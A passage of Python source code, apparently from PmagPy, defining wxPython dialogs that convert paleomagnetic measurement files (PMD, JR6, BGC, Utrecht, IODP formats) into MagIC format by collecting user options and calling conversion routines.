is required to complete the SRM discrete import.\")\n self.bSizer3.text_field.Disable()\n self.bSizer3.label.SetForegroundColour((190, 190, 190))\n self.bSizer4.text_field.Disable()\n self.bSizer4.label.SetForegroundColour((190, 190, 190))\n elif fmt == \"JR6\":\n self.bSizer0b.static_text.SetLabel(\"If you haven't already imported a samples data file from LIMS, please do so below!\\nThis is required to complete the JR6 import.\")\n self.bSizer3.label.SetLabel('Volume in cc, default is 7cc.')\n self.bSizer3.text_field.Enable()\n self.bSizer3.label.SetForegroundColour(wx.BLACK)\n self.bSizer4.label.SetLabel('DC field, default is 50e-6 ')\n self.bSizer4.text_field.Enable()\n self.bSizer4.label.SetForegroundColour(wx.BLACK)\n elif fmt == \"KLY4S\":\n self.bSizer0b.static_text.SetLabel(\"Please provide Instrument name and actual specimen volume below (if known).\\nIf you haven't already imported a samples data file from LIMS, please do so below!\")\n self.bSizer3.label.SetLabel(\"Actual specimen volume\")\n self.bSizer3.text_field.Enable()\n self.bSizer3.label.SetForegroundColour(wx.BLACK)\n self.bSizer4.label.SetLabel('Instrument name, default is IODP-KLY4S ')\n self.bSizer4.text_field.Enable()\n self.bSizer4.label.SetForegroundColour(wx.BLACK)\n\n\n self.hbox_all.Fit(self)\n\n\n def on_add_samples_button(self, event):\n text = \"choose sample file downloaded from LIMS\"\n pw.on_add_file_button(self.bSizer5, text)\n\n\n def on_helpButton(self, event):\n fmt = self.bSizer0a.return_value()\n if fmt == 'SRM section':\n pw.on_helpButton(text=convert.iodp_srm_lore.__doc__)\n elif fmt == 'SRM discrete':\n pw.on_helpButton(text=convert.iodp_dscr_lore.__doc__)\n elif fmt == 'JR6':\n pw.on_helpButton(text=convert.iodp_jr6_lore.__doc__)\n elif fmt == 'KLY4S':\n pw.on_helpButton(text=convert.iodp_kly4s_lore.__doc__)\n\n\n\nclass convert_PMD_files_to_MagIC(convert_files_to_MagIC):\n \"\"\" \"\"\"\n\n def InitUI(self):\n pnl = self.panel\n\n TEXT = \"Folder containing one or more PMD format files\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n\n #---sizer 0 ----\n self.bSizer0 = pw.choose_dir(pnl, 'add', method = self.on_add_dir_button)\n\n #---sizer 2 ----\n ncn_keys = ['XXXXY', 'XXXX-YY', 'XXXX.YY', 'XXXX[YYY] where YYY is sample designation, enter number of Y', 'sample name=site name', 'Site is entered under a separate column', '[XXXX]YYY where XXXX is the site name, enter number of X']\n self.bSizer2 = pw.select_ncn(pnl, ncn_keys)\n\n #---sizer 3 ---\n # TEXT = \"specify number of characters to designate a specimen, default = 0\"\n # self.bSizer3 = pw.labeled_text_field(pnl, TEXT)\n self.bSizer3 = pw.specimen_n(pnl)\n\n\n #---sizer 4 ----\n TEXT=\"Location name:\"\n self.bSizer4 = pw.labeled_text_field(pnl, TEXT)\n\n\n #---sizer 5 ----\n\n self.bSizer5 = pw.sampling_particulars(pnl)\n\n #---sizer 6 ---\n self.bSizer6 = pw.replicate_measurements(pnl)\n\n #---sizer 7 ---\n self.bSizer7 = pw.site_lat_lon(pnl)\n\n #---sizer 8 ----\n TEXT=\"Demagnetization Method: t for thermal, af for AF demag (optional):\\nDemag type is automatically detected for files using the H or M labels\\nfor AF demag or the T label for thermal demag in step names.\"\n \n self.bSizer8 = pw.labeled_text_field(pnl, TEXT)\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl)\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n\n vbox.AddSpacer(10)\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer7, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer8, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(20)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n self.panel.SetScrollbars(20, 20, 50, 50)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n\n def on_okButton(self, event):\n os.chdir(self.WD)\n options = {}\n WD = self.WD\n options['dir_path'] = WD\n directory = self.bSizer0.return_value() or '.'\n options['input_dir_path'] = directory\n files = os.listdir(directory)\n files = [str(f) for f in files if str(f).upper().endswith('.PMD')]\n if files:\n samp_outfile = files[0][:files[0].find('.')] + files[-1][:files[-1].find('.')] + \"_samples.txt\"\n options['samp_file'] = samp_outfile\n else:\n #raise Exception(\"No pmd files found in {}, try a different directory\".format(WD))\n pw.simple_warning(\"No pmd files found in {}, try a different directory\".format(WD))\n ID = \"-ID \" + directory\n ncn = self.bSizer2.return_value()\n options['samp_con'] = ncn\n spc = self.bSizer3.return_value() or 0\n options['specnum'] = spc\n loc_name = self.bSizer4.return_value()\n options['location'] = loc_name\n dmg = self.bSizer8.return_value().lower() #Make lower case because the dmg options are t or af\n options['dmg'] = dmg\n if dmg != \"\" and dmg != \"t\" and dmg != \"af\":\n pw.simple_warning(\"The only valid demagnetization methods t and af, but program recieved: %s\"%dmg)\n return\n if loc_name:\n location = loc_name\n loc_name = \"-loc \" + loc_name\n particulars = self.bSizer5.return_value()\n options['meth_code'] = particulars\n if particulars:\n particulars = \"-mcd \" + particulars\n try: lat,lon = self.bSizer7.return_value().split()\n except ValueError: lat,lon = '',''\n options['lat'] = lat\n options['lon'] = lon\n lat = '-lat ' + lat\n lon = '-lat ' + lon\n replicate = self.bSizer6.return_value()\n if replicate:\n replicate = ''\n else:\n replicate = '-A'\n options['noave'] = 1 # don't average\n for f in files:\n options['mag_file'] = f\n outfile = f + \".magic\"\n options['meas_file'] = outfile\n spec_outfile = f[:f.find('.')] + \"_specimens.txt\"\n options['spec_file'] = spec_outfile\n samp_outfile = f[:f.find('.')] + \"_samples.txt\"\n options['samp_file'] = samp_outfile\n site_outfile = f[:f.find('.')] + \"_sites.txt\"\n options['site_file'] = site_outfile\n loc_outfile = f[:f.find('.')] + \"_locations.txt\"\n options['loc_file'] = loc_outfile\n COMMAND = \"pmd_magic.py -WD {} -f {} -F {} -Fsp {} -Fsa {} -Fsi {} -Flo {} -dmg {} -ncn {} {} -spc {} {} {} {} {} {}\".format(WD, f, outfile, spec_outfile, samp_outfile, site_outfile, loc_outfile, dmg, ncn, particulars, spc, replicate, ID, loc_name, lat, lon)\n\n program_ran, error_message = convert.pmd(**options)\n if not program_ran:\n pw.simple_warning(error_message)\n return False\n elif files.index(f) == len(files) -1:\n pw.close_window(self, COMMAND, outfile)\n else:\n print(\"Just ran equivalent of Python command: \", COMMAND)\n\n\n def on_helpButton(self, event):\n # to run as module:\n pw.on_helpButton(text=convert.pmd.__doc__)\n\n\nclass convert_JR6_files_to_MagIC(wx.Frame):\n\n \"\"\" \"\"\"\n title = \"PmagPy JR6 file conversion\"\n\n def __init__(self, parent, WD):\n wx.Frame.__init__(self, parent, wx.ID_ANY, self.title)\n self.panel = wx.ScrolledWindow(self)\n self.WD = WD\n self.InitUI()\n\n def InitUI(self):\n\n pnl = self.panel\n TEXT = \"JR6 format file (currently .txt format only)\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n\n #---sizer 0a ----\n TEXT = \"JR6 file Type\"\n label1 = \".txt format\"\n label2 = \".jr6 format\"\n self.bSizer0a = pw.labeled_yes_or_no(pnl, TEXT, label1, label2)\n\n #---sizer 0b ---\n self.bSizer0b = pw.check_box(pnl, 'Joides Resolution')\n self.Bind(wx.EVT_CHECKBOX, self.on_check_joides, self.bSizer0b.cb)\n\n #---sizer 0 ----\n self.bSizer0 = pw.choose_file(pnl, btn_text='add measurement file', method = self.on_add_file_button)\n\n #---sizer 1b ----\n TEXT=\"User (Optional):\"\n self.bSizer1b = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 1c ----\n TEXT=\"Expedition (i.e. 312)\"\n self.bSizer1c = pw.labeled_text_field(pnl, TEXT)\n self.bSizer1c.ShowItems(False)\n\n #---sizer 1d ----\n TEXT=\"Hole name (i.e. U1456A)\"\n self.bSizer1d = pw.labeled_text_field(pnl, TEXT)\n self.bSizer1d.ShowItems(False)\n\n #---sizer 1 ----\n self.bSizer1 = pw.sampling_particulars(pnl)\n\n #---sizer 1a ---\n self.bSizer1a = pw.labeled_text_field(pnl, 'Specimen volume, default is 12 cc.\\nPlease provide volume in cc.')\n\n #---sizer 2 ---\n self.bSizer2 = pw.specimen_n(pnl)\n\n #---sizer 3 ----\n ncn_keys = ['XXXXY', 'XXXX-YY', 'XXXX.YY', 'XXXX[YYY] where YYY is sample designation, enter number of Y', 'sample name=site name']\n self.bSizer3 = pw.select_ncn(pnl, ncn_keys)\n\n #---sizer 4 ----\n TEXT=\"Location name:\"\n self.bSizer4 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 6 ----\n self.bSizer6 = pw.site_lat_lon(pnl)\n\n #---sizer 5 ----\n self.bSizer5 = pw.replicate_measurements(pnl)\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl)\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n hbox0 = wx.BoxSizer(wx.HORIZONTAL)\n hbox0.AddMany([(self.bSizer0a,wx.ALIGN_LEFT|wx.TOP), (self.bSizer0b,wx.ALIGN_LEFT|wx.TOP)])\n\n vbox.AddSpacer(10)\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(hbox0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1d, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1c, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1b, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1a, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.AddSpacer(10)\n vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(20)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n self.panel.SetScrollbars(20, 20, 50, 50)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n def on_check_joides(self, event):\n if self.bSizer0b.cb.IsChecked():\n self.bSizer0a.ShowItems(False)\n self.bSizer1.ShowItems(False)\n self.bSizer1a.ShowItems(False)\n self.bSizer2.ShowItems(False)\n self.bSizer3.ShowItems(False)\n self.bSizer4.ShowItems(False)\n self.bSizer1b.ShowItems(True)\n self.bSizer1c.ShowItems(True)\n self.bSizer1d.ShowItems(True)\n else:\n self.bSizer1b.ShowItems(False)\n self.bSizer1c.ShowItems(False)\n self.bSizer1d.ShowItems(False)\n self.bSizer0a.ShowItems(True)\n self.bSizer1.ShowItems(True)\n self.bSizer1a.ShowItems(True)\n self.bSizer2.ShowItems(True)\n self.bSizer3.ShowItems(True)\n self.bSizer4.ShowItems(True)\n self.panel.Layout()\n\n def on_add_file_button(self,event):\n text = \"choose file to convert to MagIC\"\n pw.on_add_file_button(self.bSizer0, text)\n\n def on_add_sampfile_button(self, event):\n text = \"choose samples type file\"\n pw.on_add_file_button(self.bSizer0c, text)\n\n def on_okButton(self, event):\n samp_file = ''\n options = {}\n input_format = self.bSizer0a.return_value()\n JR = self.bSizer0b.return_value()\n if input_format:\n input_format = 'txt'\n else:\n input_format = 'jr6'\n output_dir_path = self.WD\n options['dir_path'] = str(output_dir_path)\n input_dir_path, mag_file = os.path.split(self.bSizer0.return_value())\n if not mag_file:\n pw.simple_warning(\"You must select a JR6 format file\")\n return False\n options['input_dir_path'], options['mag_file'] = str(input_dir_path), str(mag_file)\n meas_file = os.path.split(mag_file)[1]+\".magic\"\n options['meas_file'] = str(meas_file)\n spec_file = os.path.split(mag_file)[1]+\"_specimens.txt\"\n options['spec_file'] = str(spec_file)\n samp_file = os.path.split(mag_file)[1]+\"_samples.txt\"\n options['samp_file'] = str(samp_file)\n site_file = os.path.split(mag_file)[1]+\"_sites.txt\"\n options['site_file'] = str(site_file)\n loc_file = os.path.split(mag_file)[1]+\"_locations.txt\"\n options['loc_file'] = str(loc_file)\n specnum = self.bSizer2.return_value()\n options['specnum'] = specnum\n samp_con = self.bSizer3.return_value()\n options['samp_con'] = samp_con\n user = self.bSizer1b.return_value()\n options['user'] = str(user)\n location = self.bSizer4.return_value()\n if location!='':\n options['location'] = str(location)\n expedition = self.bSizer1c.return_value()\n options['expedition'] = str(expedition)\n site = self.bSizer1d.return_value()\n options['site'] = str(site)\n average = self.bSizer5.return_value()\n if average:\n noave = 0\n else:\n noave = 1\n options['noave'] = noave\n meth_code = self.bSizer1.return_value()\n options['meth_code'] = meth_code\n try: lat,lon = self.bSizer6.return_value().split()\n except ValueError: lat,lon = '',''\n options['lat'] = lat\n options['lon'] = lon\n lat,lon = '-lat '+str(lat), '-lon '+str(lon)\n volume = self.bSizer1a.return_value()\n os.chdir(self.WD)\n COMMAND = \"\"\n\n # validate arguments;\n if volume!='':\n try:\n volume = float(volume)\n options['volume'] = volume\n except:\n pw.simple_warning(\"You must provide a valid quanity for volume, or no volume\")\n return False\n\n # validate file type and run jr6_magic:\n if not JR:\n if 'jr6' in input_format and 'jr6' not in mag_file.lower():\n pw.simple_warning(\"You must provide a .jr6 format file\")\n return False\n elif 'txt' in input_format and 'txt' not in mag_file.lower():\n pw.simple_warning(\"You must provide a .txt format file\")\n return False\n # remove unneeded options for jr6_txt/jr6_jr6\n for key in ['expedition', 'site']:\n try:\n options.pop(key)\n except KeyError:\n pass\n if input_format == 'txt': # .txt format\n program_ran, error_message = convert.jr6_txt(**options)\n if program_ran:\n COMMAND = \"options={}\\nconvert.jr6_txt(**options)\".format(str(options))\n pw.close_window(self, COMMAND, meas_file)\n else:\n pw.simple_warning(error_message)\n else:\n program_ran, error_message = convert.jr6_jr6(**options)\n if program_ran:\n COMMAND = \"options={}\\nconvert.jr6_jr6(**options)\".format(str(options))\n pw.close_window(self, COMMAND, meas_file)\n else:\n pw.simple_warning(error_message)\n else: # Joides Resolution\n if not mag_file:\n pw.simple_warning('You must provide a valid IODP JR6 file')\n program_ran, error_message = convert.iodp_jr6(**options)\n if program_ran:\n COMMAND = \"options={}\\nconvert.iodp_jr6(**options)\".format(str(options))\n pw.close_window(self, COMMAND, meas_file)\n else:\n pw.simple_warning(error_message)\n\n\n def on_cancelButton(self,event):\n self.Destroy()\n self.Parent.Raise()\n\n def on_helpButton(self, event):\n input_format = self.bSizer0a.return_value()\n if input_format:\n input_format = 'txt'\n else:\n input_format = 'jr6'\n if input_format == 'txt': # .txt format\n pw.on_helpButton(text=jr6_txt_magic.do_help())\n else:\n pw.on_helpButton(text=jr6_jr6_magic.do_help())\n\n\nclass convert_BGC_files_to_magic(wx.Frame):\n\n \"\"\" \"\"\"\n title = \"PmagPy BGC file conversion\"\n\n def __init__(self, parent, WD, title):\n wx.Frame.__init__(self, parent, wx.ID_ANY, self.title)\n self.panel = wx.ScrolledWindow(self)\n self.WD = WD\n self.InitUI()\n\n def InitUI(self):\n\n pnl = self.panel\n\n text = \"convert Berkeley Geochronology Center file to MagIC format\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=text), wx.ALIGN_LEFT)\n\n #---sizer 0 ----\n self.bSizer0 = pw.choose_file(pnl, 'add', method = self.on_add_file_button)\n\n #---sizer 1a ----\n self.bSizer1a = pw.labeled_text_field(pnl, 'User (Optional):')\n\n #---sizer 1 ----\n self.bSizer1 = pw.labeled_text_field(pnl, 'Location name:')\n\n #---sizer 2 ----\n self.bSizer2 = pw.labeled_text_field(pnl, 'Site name (if using convention bellow leave blank):')\n # sitename\n\n #---sizer 3 ----\n self.bSizer3 = pw.sampling_particulars(pnl)\n # meth codes\n\n #---sizer 4 ----\n self.bSizer4 = pw.replicate_measurements(pnl)\n # average replicates\n\n #---sizer 5 ---\n self.bSizer5 = pw.labeled_text_field(pnl, 'Provide specimen volume in cubic centimeters\\nNote: the volume given in data file will be used unless it equals 0.0 ')\n\n #---sizer 6 ----\n self.bSizer6 = pw.select_ncn(pnl)\n\n #---sizer 7 ----\n TEXT = \"specify number of characters to designate a specimen, default = 0\"\n self.bSizer7 = pw.specimen_n(pnl)\n\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl)\n\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n\n vbox.AddSpacer(10)\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1a, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer7, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.AddSpacer(10)\n #vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(20)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n self.panel.SetScrollbars(20, 20, 50, 50)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n\n def on_add_file_button(self,event):\n text = \"choose file to convert to MagIC\"\n pw.on_add_file_button(self.bSizer0, text)\n\n def on_okButton(self, event):\n os.chdir(self.WD)\n\n options = {}\n full_file = self.bSizer0.return_value()\n\n ID, infile = os.path.split(full_file)\n options['dir_path'] = self.WD\n options['input_dir_path'] = ID\n options['mag_file'] = infile\n outfile = infile + \".magic\"\n options['meas_file'] = outfile\n spec_outfile = infile + \"_specimens.txt\"\n options['spec_file'] = spec_outfile\n samp_outfile = infile + \"_samples.txt\"\n options['samp_file'] = samp_outfile\n site_outfile = infile + \"_sites.txt\"\n options['site_file'] = site_outfile\n loc_outfile = infile + \"_locations.txt\"\n options['loc_file'] = loc_outfile\n\n user = str(self.bSizer1a.return_value())\n options['user'] = str(user)\n loc_name = str(self.bSizer1.return_value())\n options['location'] = str(loc_name)\n site_name = self.bSizer2.return_value()\n if site_name!='': options['site'] = str(site_name)\n spec_num = self.bSizer7.return_value()\n options['specnum'] = spec_num\n if spec_num:\n spec_num = \"-spc \" + str(spec_num)\n else:\n spec_num = \"-spc 0\" # defaults to 0 if user doesn't choose number\n ncn = self.bSizer6.return_value()\n options['samp_con'] = ncn\n\n meth_code = self.bSizer3.return_value()\n options['meth_code'] = meth_code\n\n average = self.bSizer4.return_value()\n options['noave'] = average\n\n volume = self.bSizer5.return_value()\n if volume:\n try:\n options['volume'] = float(volume)\n except ValueError:\n pw.simple_warning('You must provide a valid numerical value for specimen volume')\n return False\n\n for key, value in list(options.items()):\n print(key, value)\n\n COMMAND = \"options = {}\\convert.bgc(**options)\".format(str(options))\n\n if infile=='':\n all_files=[f for f in os.listdir('.') if os.path.isfile(f)]\n outfiles=[]\n for infile in all_files:\n options['mag_file'] = infile\n outfile = infile + \".magic\"\n options['meas_file'] = outfile\n spec_outfile = infile + \"_specimens.txt\"\n options['spec_file'] = spec_outfile\n samp_outfile = infile + \"_samples.txt\"\n options['samp_file'] = samp_outfile\n site_outfile = infile + \"_sites.txt\"\n options['site_file'] = site_outfile\n loc_outfile = infile + \"_locations.txt\"\n options['loc_file'] = loc_outfile\n try:\n program_ran, error_message = convert.bgc(**options)\n except IndexError:\n continue\n if program_ran:\n outfiles.append(outfile)\n outfile = str(outfiles)\n else:\n program_ran, error_message = convert.bgc(**options)\n\n if program_ran:\n pw.close_window(self, COMMAND, outfile)\n else:\n pw.simple_warning(error_message)\n\n def on_cancelButton(self,event):\n self.Destroy()\n self.Parent.Raise()\n\n def on_helpButton(self, event):\n pw.on_helpButton(text=convert.bgc.__doc__)\n\nclass convert_Utrecht_files_to_MagIC(convert_files_to_MagIC):\n \"\"\"\n A GUI which allows easy input of meta data required to convert Utrecht\n Magnetometer files into MagIC format for analysis or contribution to the\n EarthRef MagIC Archive.\n \"\"\"\n\n def InitUI(self):\n \"\"\"\n Override of InitUI in parent class convert_files_to_MagIC.\n Creates UI for input of relavent data to convert Utrecht to MagIC.\n \"\"\"\n\n pnl = self.panel\n\n TEXT = \"Convert Utrecht Magnetometer file format\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=TEXT), wx.ALIGN_LEFT)\n\n #---sizer 0 ----\n self.bSizer0 = pw.choose_file(pnl, 'add', method = self.on_add_file_button)\n\n #---sizer 1 ----\n self.bSizer1 = pw.sampling_particulars(pnl)\n\n #---sizer 2 ----\n self.bSizer2 = pw.select_ncn(pnl)\n\n #---sizer 3 ----\n TEXT = \"specify number of characters to designate a specimen, default = 0\"\n self.bSizer3 = pw.specimen_n(pnl)\n\n #---sizer 4 ----\n TEXT=\"Location name:\"\n self.bSizer4 = pw.labeled_text_field(pnl, TEXT)\n\n #---sizer 5 ---\n self.bSizer5 = pw.replicate_measurements(pnl)\n\n #---sizer 6 ----\n self.bSizer6 = pw.lab_field(pnl)\n\n #---sizer 7 ---\n TEXT= \"use the European date format (dd/mm/yyyy)\"\n self.bSizer7 = pw.check_box(pnl, TEXT)\n\n #---sizer 8 ---\n self.bSizer8 = pw.site_lat_lon(pnl)\n\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl)\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n\n vbox.AddSpacer(10)\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer8, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer7, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.AddSpacer(10)\n vbox.Add(wx.StaticLine(pnl), 0, wx.ALL|wx.EXPAND, 5)\n vbox.Add(hboxok, flag=wx.ALIGN_CENTER)\n vbox.AddSpacer(20)\n\n hbox_all= wx.BoxSizer(wx.HORIZONTAL)\n hbox_all.AddSpacer(20)\n hbox_all.Add(vbox)\n hbox_all.AddSpacer(20)\n\n self.panel.SetSizer(hbox_all)\n self.panel.SetScrollbars(20, 20, 50, 50)\n hbox_all.Fit(self)\n self.Centre()\n self.Show()\n\n def on_okButton(self, event):\n \"\"\"\n Complies information input in GUI into a kwargs dictionary which can\n be passed into the utrecht_magic script and run to output magic files\n \"\"\"\n os.chdir(self.WD)\n options_dict = {}\n wd = self.WD\n options_dict['dir_path'] = wd\n full_file = self.bSizer0.return_value()\n if not full_file:\n pw.simple_warning('You must provide a Utrecht format file')\n return False\n input_directory, Utrecht_file = os.path.split(full_file)\n options_dict['mag_file'] = Utrecht_file\n options_dict['input_dir_path'] = input_directory\n if input_directory:\n ID = \"-ID \" + input_directory\n else:\n ID = ''\n outfile = Utrecht_file + \".magic\"\n options_dict['meas_file'] = outfile\n spec_outfile = Utrecht_file[:Utrecht_file.find('.')] + \"_specimens.txt\"\n options_dict['spec_file'] = spec_outfile\n samp_outfile = Utrecht_file[:Utrecht_file.find('.')] + \"_samples.txt\"\n options_dict['samp_file'] = samp_outfile\n site_outfile = Utrecht_file[:Utrecht_file.find('.')] + \"_sites.txt\"\n options_dict['site_file'] = site_outfile\n loc_outfile = Utrecht_file[:Utrecht_file.find('.')] + \"_locations.txt\"\n options_dict['loc_file'] = loc_outfile\n dc_flag,dc_params = '',''\n if self.bSizer6.return_value() != '':\n dc_params = list(map(float,self.bSizer6.return_value().split()))\n options_dict['lab_field'] = dc_params[0]\n options_dict['phi'] = dc_params[1]\n options_dict['theta'] = dc_params[2]\n dc_flag = '-dc ' + self.bSizer6.return_value()\n spec_num = self.bSizer3.return_value()\n options_dict['specnum'] = spec_num\n if spec_num:\n spec_num = \"-spc \" + str(spec_num)\n else:\n spec_num = \"-spc 0\" # defaults to 0 if user doesn't choose number\n loc_name = self.bSizer4.return_value()\n options_dict['location'] = loc_name\n if loc_name:\n loc_name = \"-loc \" + loc_name\n ncn = self.bSizer2.return_value()\n options_dict['samp_con'] = ncn\n particulars = self.bSizer1.return_value()\n options_dict['meth_code'] = particulars\n if particulars:\n particulars = \"-mcd \" + particulars\n euro_date = self.bSizer7.return_value()\n if euro_date: options_dict['dmy_flag'] = True; dmy_flag='-dmy'\n else: options_dict['dmy_flag'] = False; dmy_flag=''\n try: lat,lon = self.bSizer8.return_value().split()\n except ValueError: lat,lon = '',''\n options_dict['lat'] = lat\n options_dict['lon'] = lon\n replicate = self.bSizer5.return_value()\n if replicate:\n options_dict['noave'] = True\n replicate = ''\n else:\n options_dict['noave'] = False\n replicate = '-A'\n\n COMMAND = \"utrecht_magic.py -WD {} -f {} -F {} {} {} {} -ncn {} {} -Fsp {} -Fsa {} -Fsi {} -Flo {} {} {} {} -lat {} -lon {}\".format(wd, Utrecht_file, outfile, particulars, spec_num, loc_name, ncn, ID, spec_outfile, samp_outfile, site_outfile, loc_outfile, replicate, dc_flag, dmy_flag, lon, lat)\n # to run as module:\n program_ran, error_message = convert.utrecht(**options_dict)\n if program_ran:\n pw.close_window(self, COMMAND, outfile)\n else:\n pw.simple_warning(error_message)\n\n def on_helpButton(self, event):\n \"\"\"\n Displays utrecht_magic scripts help message\n \"\"\"\n pw.on_helpButton(text=convert.utrecht.__doc__)\n\n\n# template for an import window\nclass something(wx.Frame):\n\n \"\"\" \"\"\"\n def InitUI(self):\n\n pnl = self.panel\n\n text = \"Hello here is a bunch of text\"\n bSizer_info = wx.BoxSizer(wx.HORIZONTAL)\n bSizer_info.Add(wx.StaticText(pnl, label=text), wx.ALIGN_LEFT)\n\n #---sizer 0 ----\n self.bSizer0 = pw.choose_file(pnl, 'add', method = self.on_add_file_button)\n\n #---sizer 1 ----\n\n #---sizer 2 ----\n\n #---sizer 3 ----\n\n #---sizer 4 ----\n\n #---sizer 5 ---\n\n #---sizer 6 ----\n\n #---sizer 7 ---\n\n\n #---buttons ---\n hboxok = pw.btn_panel(self, pnl)\n\n\n #------\n vbox=wx.BoxSizer(wx.VERTICAL)\n\n vbox.AddSpacer(10)\n vbox.Add(bSizer_info, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n vbox.Add(self.bSizer0, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.Add(self.bSizer1, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.Add(self.bSizer2, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.Add(self.bSizer3, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.Add(self.bSizer4, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.Add(self.bSizer5, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.Add(self.bSizer6, flag=wx.ALIGN_LEFT|wx.TOP, border=10)\n #vbox.Add(self.bSizer7, 